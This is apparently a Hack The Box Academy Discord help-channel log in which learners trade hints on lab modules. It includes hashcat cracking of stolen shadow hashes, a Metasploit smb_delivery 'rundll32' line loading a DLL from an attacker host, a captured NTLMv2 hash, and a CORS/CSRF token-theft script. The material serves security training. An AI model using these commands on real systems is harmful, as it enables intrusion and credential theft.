The SNMP port is closed, but trying this port is a guess once they use POP3 and IMAP?
SNMP isn't closed, or it shouldn't be, you just need the right string
Read the engagement, it gives you a fairly good reason to guess snmp
"Management Server"
the main target 172.16.6.155 is in the same subnet, I am trying to ping it but get no response
It's not
the subnet mask is /16
Interface List
  9...00 50 56 b9 e8 a2 ......vmxnet3 Ethernet Adapter
  4...00 50 56 b9 09 b8 ......vmxnet3 Ethernet Adapter #2
  1...........................Software Loopback Interface 1

IPv4 Route Table
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0       172.16.5.1    172.16.5.150     271
          0.0.0.0          0.0.0.0       10.129.0.1   10.129.42.198      15
       10.129.0.0      255.255.0.0          On-link    10.129.42.198     271
    10.129.42.198  255.255.255.255          On-link    10.129.42.198     271
   10.129.255.255  255.255.255.255          On-link    10.129.42.198     271
        127.0.0.0        255.0.0.0          On-link        127.0.0.1     331
        127.0.0.1  255.255.255.255          On-link        127.0.0.1     331
  127.255.255.255  255.255.255.255          On-link        127.0.0.1     331
       172.16.0.0      255.255.0.0          On-link     172.16.5.150     271
     172.16.5.150  255.255.255.255          On-link     172.16.5.150     271
   172.16.255.255  255.255.255.255          On-link     172.16.5.150     271
        224.0.0.0        240.0.0.0          On-link        127.0.0.1     331
        224.0.0.0        240.0.0.0          On-link     172.16.5.150     271
        224.0.0.0        240.0.0.0          On-link    10.129.42.198     271
  255.255.255.255  255.255.255.255          On-link        127.0.0.1     331
  255.255.255.255  255.255.255.255          On-link     172.16.5.150     271
  255.255.255.255  255.255.255.255          On-link    10.129.42.198     271

Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
          0.0.0.0          0.0.0.0       172.16.5.1  Default
No links to 172.16.6.x
nope
You're missing a middleman host, literally reread the section and it'll click
Idk why you're being persistent about this.
I am entirely correct
I have completed this module
I even missed the same thing my first time
Re-read and it clicked
There's a middle host with another user
I am not doubting you I just cannot find it but I will check again
The ip will be 172.16.5.x
yep got it
yo marcie. Have you done the skills assessment for Attacking Common Applications?
Haven't touched common apps
I was just going on the ip for the task
Which is the last hop in the chain
and never did a check for the one in the section
I tried using ligolo and doing a ping sweep, nothing popped up yet
so I was confused
There's a reason I phrased a -> b -> c
If you're using ligolo you don't need to do the rdpoversocks thing
yea but I wanted to try rdp
¯_(ツ)_/¯
when I could not, so I thought of doing it with ligolo then rdp
Either way. You looked over a step in the chain. (Which the section gives you creds for)
Bc this section is mostly about double pivots
Also you can rdp through ligolo
As a just FYI :)
Thanks for helping me
so I was doing and my instance got expired going to try tomorrow
85% done now with the CPTS. I think I was at 70% on Friday and now I feel like I can see the devil
Right there with you. Down to windows privesc, report, and enterprise modules
Are there any sorts of sites where you can have a url for a short amount of time (kinda like a temporary email) and see all the traffic that goes to it? Seem to remember using one for a module ages ago.
Module: ADVANCED XSS AND CSRF EXPLOITATION
Section: Bypassing CSRF Tokens via CORS Misconfigurations
I'm struggling with my payload and would really appreciate some help if someone was offering. I seem to be struggling with even grabbing the token value.
Hello everyone, I'm currently working on the SOC Analyst path and I seem to be having difficulties with Windows Event Logs and Finding Evil. In the section "Tapping into ETW", when I launch the attack, capture the log and review the etw.log, I cannot find the answer it is asking for. I am using CTRL+F to match what the screenshot shows but get no results. Can anyone assist?
Instantly generate a free, unique URL and email address to test, inspect, and automate (with a visual workflow editor and scripts) incoming HTTP requests and emails
awesome, exactly was I was looking for. thanks!
alg, was attempting some oob sqli but didn't really work. thanks tho
I had the same issue, to me it almost seems like the format has changed since it was released. I used a powershell command to search for the string 'Seatbelt', saved it to a file and searched for 'ManagedInterOp' or whatever the string is that's next to the answer (blacked out on the screenshot)
@next bronze @tranquil axle good news and bad news everyone else is having a hard time 💀
So we are gonna email prof
Do you remember what command you used?
PASSWORD ATTACKS >>> Passwd, Shadow & Opasswd
>>> Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.
I was able to transfer the shadow.bak and passwd.bak file from target machine to attack machine and unshadowed both files to file called "unshadowed.hashes". I'm stuck on trying to crack the hash based on given resource folder in HTB but it fails for some reason. Can someone help who went through same module?
I'm not good at powershell so I just googled how to do it. Essentially I was trying to cat out the file and grep "seatbelt" so that I could have a smaller file to search for the answer. If you need more guidance feel free to DM me.
good, your prof should stop smoking whatever they were smoking
I hope yall can get the point across that that module requires knowledge of all the previous modules, or at least get them to do the lab themselves
Hey all, can someone please assist on my question I have been stuck on it for 2 weeks now
https://academy.hackthebox.com/module/147/section/1322
this module requires kira password, anyone remember when did we attack kira lol
use a mutated loveyou list
i remember now but can not find that section :((
the kira thing is in a hint I think the original password was Iloveyou1 in the hint.
yeah i think it was loveyou1 or smth
i spent a lot of time trying to look for that question too lmfao
You have to use hashcat -m 1800, the section covers it under Linux local password attacks
also don't use rockyou.txt
I used that
use the mutated list for the passwords from the module to crack the hash
but the output says "exhausted" when customizing the given password file in the module
mutate the password list
I have mutated the password list and the outcome of hashcat is "Exhausted". I can't find what is wrong leading me to that error
well I can say the same too
I'm retaking the steps as advised and will get back to you in a few minutes
can anyone please help me with Advanced Deserialization Attacks - Example 1: JSON.. I have a payload but unable to get a shell (edited)
is uploading pic snips disabled?
anyone having issues spawning a target right now?
So below are the commands I ran, let me know if find any problems:
hashcat --force password -r custom.rule --stdout | sort -u > mutated.txt
hashcat -m 1800 -a 0 unshadowed.hashes mutated.txt -o file.cracked
Host memory required for this attack: 65 MB
Dictionary cache built:
* Filename..: mutated.txt
* Passwords.: 94044
* Bytes.....: 1034072
* Keyspace..: 94044
* Runtime...: 0 secs
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: unshadowed.hashes
Time.Started.....: Fri Jan 19 03:08:02 2024 (1 min, 27 secs)
Time.Estimated...: Fri Jan 19 03:09:29 2024 (0 secs)
Guess.Base.......: File (mutated.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2118 H/s (5.65ms) @ Accel:16 Loops:1024 Thr:1 Vec:4
Recovered........: 2/4 (50.00%) Digests, 2/4 (50.00%) Salts
Progress.........: 376176/376176 (100.00%)
Rejected.........: 0/376176 (0.00%)
Restore.Point....: 94044/94044 (100.00%)
Restore.Sub.#1...: Salt:3 Amplifier:0-1 Iteration:4096-5000
Candidates.#1....: yellow93 -> Yellow99!
Started: Fri Jan 19 03:08:01 2024
Stopped: Fri Jan 19 03:09:30 2024
yes
shout out for @misty current for nice hint
I don't fully understand the question. I found a couple different possible answers but none of them seem to work
This is the footprinting smb module
rpcclient
hi i'm facing problem when try sed -i, can u help me ?
what do you see in file.cracked?
file.txt didnt get created on Desktop
I assume because the hashcat wasnt successful and hence the file.txt wasn't created
you're supposed to steal passwd.bak, shadow.bak, then unshadow, use the hashcat command to crack the file, and it should be in your home directory in your attack box
the -o specifies the output file.cracked, which you should be able to cat out.
in that file there will be new hashes, one for root which you crack using any tool of your choice
thank you so much
so I did transfer the passwd.bak and shadow.bak by using scp to target machine
it should be on your machine, not the target
yes good, now you can unshadow and crack it with the mutated list
lol I did unshadow:
unshadow passwd.bak shadow.bak > ~/Desktop/unshadowed.hashes
okay now just crack it with hashcat using the command from before the output file is file.cracked and it should be in the location you ran hashcat from
if you are truly lost as to where file.cracked is use locate file.cracked
even if hashcat status is Exhausted, you think file.cracked would be created?
No result:
locate file.cracked
locate: warning: database ‘/var/cache/locate/locatedb’ is more than 8 days old (actual age is 259.9 days)
you can't use locate without first updating the database, you should know where the file is saved, either in your current dir or the specified path
what's your hashcat command
@rustic sage I sent you some pictures for better visual input of my work
Maybe you can get the prof to showcase how one would do the lab as an "at the end of the class you understand how this is done"
- So initially I transferred passwd.bak and shadow.bak from the target machine by using scp
- I unshadowed passwd.bak and shadow.bak to a file called unshadowed.hashes
- then mutated the password file given through the module
- Ran hashcat to crack the unshadowed.hashes but it fails and gives "Exhausted" status
" hashcat -m 1800 -a 0 unshadowed.hashes mutated.txt -o ~/Desktop/file.cracked "
so is there the ~/Desktop/file.cracked file
In your output above it said it removed 2 hashes from the input (because they were already cracked), I forgot the command but can't you do --show or something with hashcat to see the pot of those?
oh didn't see they sent the output, yes use --show and don't need to specify the outfile
does anyone know this, I'm trying to install a kernel on my fresh Kali and I already got all the resources I'm aware of and was able to download it, but then when doing the make command it takes like 30 min to compile and at the end it gives an error Makefile:234:__sub-make Error 2 when trying to make the kernel. anyone know what this means?
I've tried downloading different versions and then tried recompiling like 5 times already
would that look like following:
hashcat -m 1800 -a 0 unshadowed.hashes mutated.txt -o unshadowed.cracked --show
why don't you try it first
did it but didnt work
"didn't work" what type of error do you get?
if you scroll up in the terminal -> do you see the cracked ones
did the file unshadowed.cracked get created
note: the default output mode outputs hash:password so the password will be at the end of each hash it cracked
no the "unshadowed.cracked" does not get created after running hashcat
ok, what about my other questions; what error did you get (if any)
I dont get any error but hashcat shows "Exhausted" as status and does not populate a unshadowed.cracked
ok so scrolling up do the ones it did crack show in the terminal?
if you used --show hashcat wouldn't attempt to crack the hashes
and as I said don't specify the outfile
hashcat unshadowed.hashes --show -o unshadowed.cracked might work to give an output file
you don't need to, but it doesn't hurt
checking it
yeah but it's another step to find the file
Ok I got two hashes by running that on my personal VM rather than Pwnbox
Whats next now😭
Guys, someone please help, how do I start my career as an ethical hacker
GOT THE ANSWER AFTER 2 WEEKS
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
2 weeks? geez
Give up bro😂
Why bro?
should say that about you since you had to be guided to the answer
bc you couldn't think of that on your own
Just kidding follow the HTB CPTS pathway and keep grinding
@rustic sage read this
Ok
As long as you try it never hurts
yes but you didn't even think to try
also if you didn't crack it in the pwnbox why would the hashes be loaded in the pwnbox fwiw
you said you got it with your own vm, why not stick to that
Also running pwnbox and the vpn on your own vm can (and does) cause connection issues to the targets
bruh giving hint/tips doesn't cost the person any money
Everybody is built with different thought process and approach problems
¯_(ツ)_/¯
your way works for you and someones work for them
i'm just givin you shit since you were ready to just throw "Give up" as a joke to someone that's new
¯_(ツ)_/¯
having someone helping you connect the bridge together is what people do not go off like you did my friend
joke is a joke bro
nah a joke is meant to be funny
a joke would have been "Turn on your computer"
or something along those lines
Telling someone "give up" is just offputting
Alright Professor McGonagall you win, have a good day/night😂 🤦♂️
don't spend another 2 weeks on the next bits ¯_(ツ)_/¯
Sounds very discouraging for a person who just ranted about not discouraging others
also fwiw don't forget to keep track of passwords in that module
depends on how you look at my statement
2 weeks sounds like you didn't reach out for assistance once what you were trying wasn't working
¯_(ツ)_/¯
Maybe if you were attentive in the channel then I'm sure you would have seen the comments for help
¯_(ツ)_/¯
for the previous sections
phrasing is also important
were you stuck for 2 weeks at that part, or the module itself
there's a HUGE difference
alright bruh, I don't know why you're ranting so much rather than just accepting the joke and being quiet, unless I'm talking with a disturbing 10 year old kid
if you don't want me to view you as silly for wasting 2 weeks on a single section over reasonable for the whole module ¯_(ツ)_/¯
but nevertheless, have a good day my friend and hopefully you're calmer by someone's next question
after you complete the path i'd highly suggest you revisit this module to make sure you understand it if you're planning on tackling the exam
¯_(ツ)_/¯
that and the file transfers module
as you seemed to have issues previously with file transfers
halp
I think I deleted the flag
I'm working on the CRUD Api module, and I updated the london's entry to "Flag", deleted it, then deleted baltimore, but there's no flag
oop nvm
am hackerman and figured it out
?
I did indeed accidentally delete the flag btw if curious
nice
Ok I am new in HTB, can anyone help me
No
thanks for deleting Baltimore; that city is a piece of shit anyway
no problem lmao
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
From where you are
sir
they'll have no access unless they follow instructions 
oh rip
ye only a handful of channels are available if your account isn't linked
Yeah, I thought the instructions for the module were rename city to flag, delete city, then search for flag. But obviously it'd be deleted if I deleted it, so I just renamed Memphis and it worked again
cuz faaaahhhkkkk Memphis lol
IN WINDOWS PRIVILEGE ESCALATION - Windows server
I do the commands for smb_delivery but it doesn't open a session for me, instead it returns the hash for htb-student.. what is missing?
I tried to upload a screenshot but for some reason I can't add it to this channel.
my steps:
use exploit/windows/smb/smb_delivery
set srvhost 10.10.....
exploit
and in the windows machine in cmd: rundll32.exe \\10.10....\aZaOLL\test.dll,0
it gives me that:
[SMB] NTLMv2-SSP Client : 10.129.97.145
[SMB] NTLMv2-SSP Username : WINLPE-2K8\htb-student
[SMB] NTLMv2-SSP Hash : htb-student::WINLPE-2K8:bb99524dcf3917d1:b4a699ffc6ddbd9a317217b1b6e6cb34:010100.... (shortened it..)
sessions
Active sessions
No active sessions.
but it is the hash of htb-student, so I already have his password, no?
yes.. tried like 10 times.. Its not what they wanted in the module.. they wanted a session, but it doesn't return one
is your LHOST correct?
yes - it is ifconfig tun0 right?
can I send you screenshot in private? for some reason I can't send here
no
you need to verify your app.hackthebox.com account following instructions in #welcome to send screenshots here
and not have large codeblocks yeeted if you format them
ah ok thanks
spam protection type of thing
so skids and trolls don't spam the channel with nsfw/l images
there it is.. thanks
lhost isn't correct
"started reverse TCP handler on Public IP
that's the public IP of your pwnbox instance BTW
should be also ifconfig tun0?
yes
the targets don't have internet access; so they can't reach out to that public IP
changed, but I get the same result
yes sure.. ohh ok, thanks a lot anyway
by that i mean after adjusting the lhost to the correct IP; you ran exploit again?
Were you able to sort this out? I'm struggling on the same section.
Can someone confirm for me that rdp is almost all the time pretty unusable? 😞
Use the tcp vpn
anyone know why my Available Networks is greyed out in Kali. In my VM I made sure to pick Bridged and then on the USB I enabled my network USB too.
This isn't a support group for Kali
Might need the firmware
DM me
That’s better! Thank you!
can someone help me with the monitored htb box, please dm
Hi guys, anyone having the issue with this question.
Module name: WINDOWS ATTACKS & DEFENSE
Section name: Print Spooler & NTLM Relaying
Issue: Ambiguous answer format to 2nd Question
After performing the previous attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and make the appropriate change to the registry to prevent the PrinterBug attack. Then, restart DC1 and try the same attack again. What is the error message seen when running dementor.py?.
No, read #welcome and follow the instructions there
Hello, I have a problem with this question, normally it is correct
Can you help me please
POST DATA request, you would need to URL encode the & or else it's gonna take it as a new parameter. Which Module is this?
COMMAND INJECTIONS
Identifying Filters
retype the &, a "&" in post body is the sign for a new parameter
did you see any output of whoami ?
I do
& is not the right answer then it seems
try something else , obviously & is not the right answer
idk what section that is but try another injection character
I was able to, you can dm me for help
doesnt that space in your payload break it?
Hey mates. Thanks for your help yesterday. I have now completed my first box. I just wanted to say that 🙂
I tested all possibilities, I don't find it
Space as + maybe
Hello !
I am trying to solve the issue in Footprinting Lab - Med.
I am having an issue reading the directory after NFS mounting
I tried chmod 777
But it is still ( Permission is denied )
I tested also
sometimes the rdp machines are very very laggy
what can I do to make them less laggy?
btw I am running those rdp machines from the HTB Academy attack box, will it be less laggy if I run those rdp machines from my local VM?
there's three it mentions in that question, just try all of them
newline doesn't work in urls as \n though, so use url encoding (%0a)
or & and |
I cannot get this fourth skills assessment question...any hints?
Hello, is there any support here? I don't get the password reset sent to my email address
check spam, trash
contact support liam
Need to speak to a person? Learn how to reach our support via HTB Labs.
In the module Advanced XSS and CSRF Exploitation, section xss bypass.
I have a working xss payload tested in chrome and firefox, with exfiltration.
However I get no response or interaction from the "admin" user.
At first I thought the URL might be too long with the html response so I just sent /x, but that didn't change anything.
solved it, for everyone else with this issue, ||this is the first time ports matter for the admin||
I feel like Completing the Windows privilege escalation module prior to tackling the Attacking and Enumerating Active Directory modules would have been significantly beneficial for the second skills assessment haha
Make sure, you are root before mounting the nfs
Hey, i want to ask which one is better ... using the pwnbox with the modules in academy for the labs or i should fire up my own Kali Linux VM?
Own
hello
I was doing the Shells and Payloads module and I am stuck in the Antak-WebShell part
I am not able to import the aspx file
but according to the walkthrough it should work
but in the vhost it is throwing an error to only upload .zip or tar.gz files
15 minutes back I was able to upload an aspx file when I was doing the Laudanum path
anyone remember the module name in which we have to perform a phishing attack, creating an lnk file? Not able to find that section
are you confusing it with the oscp course 
🤔 lol
doing it manually is lame, check out the netexec slinky module
https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-slinky
Two modules teach you that
is the browser instance more powerful than my Kali VM on Academy?
Any quick fix for machines not spawning in Attacking Common Applications (osTicket and GitLab)? Probably other ones too
Sorry i got confused with the oscp course 🙂
- For NTLM Relay Attacks, it is it taught in: Framing Hashes
- For CME, it is taught in: Stealing Hashes
depends on how much resources you're giving your vm
the intro to assembly module is killing me lol
I have a powerful rig
so I just don't know which one to play around with for long term use
Lol both the modules are locked for me
it's always better to use your own vm, you get to keep your changes and use your configs
gotcha
tier 3 modules, but they're very good
and for password cracking it's better to use the GPU to my knowledge. But I don't think I have the full performance in a VM, or do I?
nope, hashcat doesn't have access to the GPU in a VM, run it on your host
Personally I use hashcat on my main computer (windows) its same in windows and linux and you can download it from their website
Gotcha lads
GPU cracking is like 40x faster for me
if you have the optimal wordlist of course
hashcat will always be faster with a gpu, that's what it's designed for
Depends on the hashtype and how much power your gpu has, wordlist has nothing do with it
i see
I'm currently doing the Nibbles Module for the CPTS exam. And I want to use my own VM instead of the PwnBox. But I cannot ping the target. I just get:
$ ping 10.129.172.48
PING 10.129.172.48 (10.129.172.48) 56(84) bytes of data.
From 10.10.16.1 icmp_seq=1 Destination Host Unreachable
From 10.10.16.1 icmp_seq=2 Destination Host Unreachable
From 10.10.16.1 icmp_seq=3 Destination Host Unreachable
From 10.10.16.1 icmp_seq=4 Destination Host Unreachable
From 10.10.16.1 icmp_seq=5 Destination Host Unreachable
From 10.10.16.1 icmp_seq=6 Destination Host Unreachable
From 10.10.16.1 icmp_seq=7 Destination Host Unreachable
From 10.10.16.1 icmp_seq=8 Destination Host Unreachable
From 10.10.16.1 icmp_seq=9 Destination Host Unreachable
Anyone else had this issue?
My OpenVPN looks fine, It does not return any errors.
give it a bit to spawn, if not reset
Thanks a lot, I'll try!
your vpn is fine since you can reach the router
yeah exactly, I've never had issues with it on regular machines.
reset worked!
So I'm stuck in the Intro to Assembly module, Debugging with GDB section, for 2 days. The question is asking to find the hex value of "rax" when we reach the instruction at <_start+16>. I set a breakpoint at that address and step to <_start+16>. Then attempt to read it with x/$rip and it spits out a hex value. But it's not correct. Any advice on what I'm doing wrong?
read the question carefully, which register should you be looking at?
you're a lifesaver.
Hello, I have a problem with this payload... I think it is my pipe | but I tested two possibilities and it is not ok.... can you help me please?
why don't I find my "downloads" directory? following some guide and I don't have it
Does anyone know a way to get remote code execution on a Nagios XI server if you have the admin account on the webapp???
this is not the place to ask, read #welcome to get verified and ask in the appropriate channel
Hi! I'm terribly stuck on a question about a "for loop" and decoding a hash. Can anyone help me?
https://forum.hackthebox.com/t/introduction-to-bash-scripting-hack-the-box-academy/243473/30?u=glebius
Hi! I can’t figure out what’s wrong with my code. Could anyone help me out? The output is 34071 and *** WARNING : deprecated key derivation used. Using -iter or -pbkdf2 would be better. HTBL00p5r0x I’ve tried other ways too but then I get either nothing or wall of text. I bet it’s something primitive like a wrong bracket. for counter in {1....
?? the answer is right there
idk it doesn't accept 34071 and I've tried hints from the thread
that's not what the question asked for
Yo guys, so I'm currently doing the skills assessment for SQLMap, I found sql injection and I was able to exploit it. The thing is once I dump the specified table(Final_flag). I get
<blank>
in the
content
column(Where the flag is supposed to be). I'm dumping the whole database right now but because it's time-based SQLi, it may take a while. I was wondering if anyone has any trouble with the skills assessment? I also restarted the machine multiple times
Uhm... I'm confused even more, it's said the number of characters in 28th hash must be assigned to "salt"
yes, and you have already done that
take a wild guess what the answer is from your output
So the script is correct, the answer is right here, but I don't see it, right?
Still no idea what it is. Thought maybe I should write the loop in the answer
it could not be more obvious, like I said take a wild guess what the answer is from your output
also helps to understand your own code
maybe I remember why..if you read again the things in the sql injection module you should find an option for sqlmap that could solve the problem..I don't wanna spoil too much
I'm going out for like 30 minutes..if you can't find a solution, you can dm me later
I see, thank you. I've changed the code slightly and couldn't see the answer now. Stuck on it for 2 days lol
the answer is literally in your post
Yes, I've found it! I couldn't see it because I've changed the code and it was giving a slightly different error afterwards. Thanks again
Thanks never mind, I just had to restart the machine 5+ times and it worked, I'm not a 100% sure why though
I suggest you break the one command in steps. The whole command base64 doesn't work. But breaking it into steps, and base64 encoding each piece of the step, sending multiple requests instead of one big chunk worked for me.
Module: ADVANCED XSS AND CSRF EXPLOITATION
Section: Bypassing CSRF Tokens via CORS Misconfigurations
I'm struggling with the payload creation in this module and would welcome feedback. Copying the module's payload directly doesn't work; at first I thought it was an issue with just variable/parameter renaming, but then I broke it down to just the first half that's presented:
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://vulnerablesite.htb/profile.php', false);
xhr.withCredentials = true;
xhr.send();
console.log(xhr.responseText); //I added this for debugging
</script>
And went and clicked "View Exploit" and noticed the following console error:
So I'm realizing that the /profile.php endpoint isn't ever getting loaded by the request, hence why I'm not able to grab/pass the CSRF token.
But I'm not sure what the fix is meant to be
Would welcome feedback.
Hello, I wanted to know if I am the only one whose rdp on the Academy Windows machines is really slow and crashes really often.
If someone found a solution for this I'm not against it.
Understanding Log Sources & Investigating with Splunk
Skills Assessment
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the process that started the infection. Answer format: _.exe
Can someone dm me? I got the answer but I didn't get it the right way, it was just luck. So if someone can help me on how to search for that it would be nice 🙂
DM me.
Hi everyone
Hi Everyone, quick question. For the SIEM module question : Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Either create a new visualization or edit the "Failed logon attempts [Admin users only]" visualization, if it is available, so that it includes failed logon attempt data where the username field contains the keyword "admin" anywhere within it. What should you specify after user.name: in the KQL query?
I tried admin, *admin its not taking it. It works in Elastic search platform but not sure why the answer is not accepted. Any ideas ?
I understand it wants me to specify "admin only" and admin or *admin does that, so not sure why HTB isn't taking the answer 🤔
anyone else having problems using ssh to connect to boxes? it worked the first time I did it, now it keeps saying connection closed by [address] port 22
hello, I'm new here
Hey all, can anyone point me in the right direction with the Bizness machine
I refuse to believe that the only solution to it is bruteforce XD
This is unrelated to the channel
Read #welcome on how to access more of the server
so I was hacking the Nibbles box, and had my port 8080 open to make a file transfer to my target host, when I suddenly got a surprise connection. someone else connected to me! the connection was made by www.whitehouse.gov:443. super weird. have any of you guys tried something similar?
Pwnbox has its interfaces open to the internet. Still funny though
someone played the reverse uno card on me
can someone help me
I'm doing the Web Requests HTB Academy section POST and I'm having issues
I’m sure since you asked such a detailed question someone can help
let me get to it
I am trying to get the server_ip file to populate in the network tab, and nothing is showing up, only a bunch of CSS and PHP files
I've tried clearing and redoing it probably 10 times now and nothing
any idea why that might be?
wait, I might be stupid, give me one moment
Chat: is he stupid
Yo wassup y'all
I been wondering how y'all be getting them robux
can y'all help me hack robux
😦
Can you shut the fuck up ? You're not a cool 666Hacker Skibidi sigma
I'm telling you this isn't the server you're looking for
It is, I know my places
You're just not a SkibidiToiletSigmaAmogusSussyBaka666HackerSigma
No, you don't
yeah, I am actually lost, would be cool to get a hand 🙂
This isn't a robux hacking server
Spitie toilet, spibkidi skpitie toielt.
Haven't done this module lol
It is a hacker server
@solid python prank 'em john
it's super simple, I'm just not getting the data I need
I'm about to hack mee6 and turn him black
OK kid have fun
and take over the server with pop smoke and snoopdog my beloved
Omg it's "HIM"
are you acoustic
Not the server for this
anyways how do I hack Minecraft
Mo..?
who would win mine craft steve or goku or sglitch skibdi toilet titan
Yes
got a 2 for 1
It's a 2fer1 combo
you guys have patience for sure 😄
I mean I'm not here often, but all the time there are some idiots messing around
Patience? Nah just ability to recognize trolls
I'll go with sglitch skibdi toilet titan
I'm just trying to seek help
Sorry, you got hit in the face with the dumb train when asking for help
What have you tried?
All the task is, is to get a server request to populate in the network tab on the dev console, but I'm getting different results than the Academy guide
unless I do have it and am just confused
ty
You're not always gonna get the same thing as the example
same man
@jolly cradle hey guess what ^
ok ill try one thing then ask for more help
There's huge bot/troll campaigns going on rn btw @jolly cradle
They're targeting public servers
👀
if only there was a method to prevent randos from accessing channels without verification to add an additional layer of effort to dissuade opportunistic trolls
Might wanna park for a bit until it blows over
Ah. Cringe.
Too difficult
You're too slow old man
They're all JJK themed I hate it
why tf do people waste their time with that crap
Sociopathy
Bored teenagers
brain worms
ahhhh i think i figured it out
Question regarding "Kerberos Attacks: Constrained Delegation Overview & Attacking from Windows":
- Under "Abuse Any Service", the attack being referred to is the only option because Constrained Delegation is enabled with "Use Kerberos Only" within the properties of the service account?
- Under "Impersonate Any User", the attack referred to is only available because Constrained Delegation is enabled with "Use any authentication protocol" within the properties of the service account?
Hey guys, on the linux privilege escalation module, sudo section, I keep trying to run the git clone command for the exploit but it keeps returning 'could not resolve host: github.com'. Is this an internet problem?
the target machines are not connected to the internet
Yooo, do you guys also experience that the boxes in the academy modules are "slow" or laggy? It's pretty random. Sometimes it gives me huge 25 second delays and then it's snappy for 25 seconds and then the delays again. Is there a fix?
I'd reach out to our customer support team who can look into the issue for you
Need to speak to a person? Learn how to reach our support via HTB Labs.
Thanks, I wrote to them yesterday and still no answer 
it's pretty hard to edit in VIM when the cursor keeps flying everywhere xd
what is wrong with this command?? keeps giving me an error .... curl -X POST -d '{"search":"Flag:}' -b 'PHPSESSID=68v86efjbp2eaen62v4uuco0f1t' -H 'Content-Type: application/json' http://83.136.250.104:45684/search.php
wrong JSON syntax, use double quotes for the key and value pair.
Might be why.
still says no URL specified
If I can't connect to the internet how am I supposed to run the exploit?
by transferring it
I think there's a flag to specify the website
isn't it a url?
Or try putting the url first then the flags
python3 -m http.server - host wget host_ip:8080/file.txt - target
err ip
Ip and url can be interchangeable
hmm im following an example to see my errors and its the same
hmmm let me try one more thing
anyone?
do i use double quotes everywhere quotes are needed or just single quotes? im using regular windows command prompt?
You. Never closed the quote btw after Flag:
Rami3l hinted that your json request was wrong btw
Yes was just confused what he meant
I was following another person on medium when I got stuck
... {a:b} is json
Why are you following a medium article, 1, and two - it's likely the section showed you what to do
Because I was confused about what academy was showing me so I googled….
My b
Most of the modules are pretty decently written, especially the intro ones,
Hi I’m in password attacks - password mutations …. I’m like 3 hours and still no luck any recommendation ?
I did split the file in 16 parts keep waiting ? 🥲
Guess I’m just not very smart then
Don't attack ssh
I did try ftp with >= 10 characters but no result either
Don't specify anything except threads
-t 48
I got it on the forum
what's your command?
I keep waiting update y late hahaha maybe 3 hours more 🫠
The fuck is that -P? Is that what you called the password list?
Bc you don't need to segment it
It's completely doable without splitting it
-P is for the password list and segments are the splits
Don't split
Hmm ok
Fuck off
Wtf
<@&861185840277487616>
I reset and try it again no splitting
No advertising #rules
Ok
Tens marcie
Should be~ 5-10 minutes maybe a bit longer
hecker
Hello mate
hello master 
Do people really fall for this?
Unfortunately
yes sadly
Ok tkns 🤙
my password is hunter2
I only see *******
User safety is important
new update, lets see the github creds too
For the sudo module on Linux Priv Esc sudo section, for some reason I can't run sudo -l without it prompting me for a password, any reason why? I tried running the hax me a sandwich exploit but that didn't work either
Does anyone know the difference between Kerberos Constrained Delegation attacks where Constrained is set vs Constrained w/ Protocol Transition is set?
can someone help with the windows privilege escalation module for the citrix breakout section?
with protocol transition the service can request a TGS for any user
And is that because the TGS ticket isn't forwardable when using S4U2Self to obtain the TGS ticket? If Protocol Transition isn't enabled I mean
its because with protocol transition enabled its not guaranteed the original user (that the service is supposed to be requesting on behalf of) even has a kerberos ticket of their own. And a TGT is kinda needed for a TGS to be requested normally. Protocol transition is the DC handwaving the TGT requirement and just trusting the service.
Good explanation, thank you!
Kerberos is like "oh you're that service? Cool you're good to go"
Better than ADCS?
need a recommendation, not so good with constrained delegation and all.
ntlmrelay attacks module too is fighting for my cubes lmao
it really is, it's helping me understand Active Directory Enumeration & Attacks better.
More like, "Oh hi mr. service! Oh user needs to access something? Well I don't have a record of them asking because kerberos is stateless. You don't have any proof this user needs the service? Well normally I'd be displeased with you mr. service but protocol transition is enabled so imma let it slide this time."
haven't done ADCS module yet so idk
So I would have to wait for an actual request to come through from an actual user or use the Printer Bug (maybe?) to force the user to authenticate to the service I want to access?
ah ok, nw. Thanks anyway 🙂
my recommendation would be Kerberos Attacks first, then ADCS, then anything else
im still stuck
it's saying a valid authentication cookie is required now
curl -X POST -d '{"search":"Flag"}' -b 'PHPSESSID=jj4kcovqpslp8h79627945dbcq' -H 'content-Type: application/json' http://94.237.63.93:30436/search.php
Seems like your cookie is not valid
the PHPSESSID?
Yes
Attacking Common Services: Medium Lab
I found the opened ports, besides the obvious ones there's loads of 5 number ports above the 10000s.
I tried to bruteforce FTP on 2121, Tried anonymous login as well, bruteforced SSH, didn't work.
I haven't used smtp user enum (since 23 isn't open). I might resort to some tactic that will obtain info from the pop3 as that's the only one I can possibly extract info from. I haven't used rockyou.txt yet, hence I will probs bruteforce with the provided user list and rockyou.
Am I on the right path?
- I used dig axfr and found them .inlane domains. I did dig for txt , nothing found.
Copy/paste
This lab gives you creds
ceil
D:
Peep the banner on that port
No?
Oh..the ip:port on the firefox
or with the ftp command
W marcie.
Well I tried ftp 2121, but uh..can you assign 1 service to multiple ports??
curl -X POST -d '{"search":"flag"}' 'PHPSESSID=ji4kcovqpslp8h79627945dbcq' -H 'Content-Type: application/json' http://94.237.63.93:30436/search.php
curl: (3) URL rejected: Bad hostname
curl: (6) Could not resolve host: application
A valid authentication cookie is required!
I don't think browsers support ftp anymore, it should be deprecated since like 2020
¯\_(ツ)_/¯
As with this whole module, go slowly, and read, re-read, and re-re-read everything... if still stuck, feel free to DM me what you've done, what your thoughts are, etc and will help from there.
maybe you need to use the hostname, just add it to the hosts file
I dunno just going by the error
where is the endpoint like http://IP....
wdym?
your curl request isn't complete
what is missing?
It's at the end of his line...
^
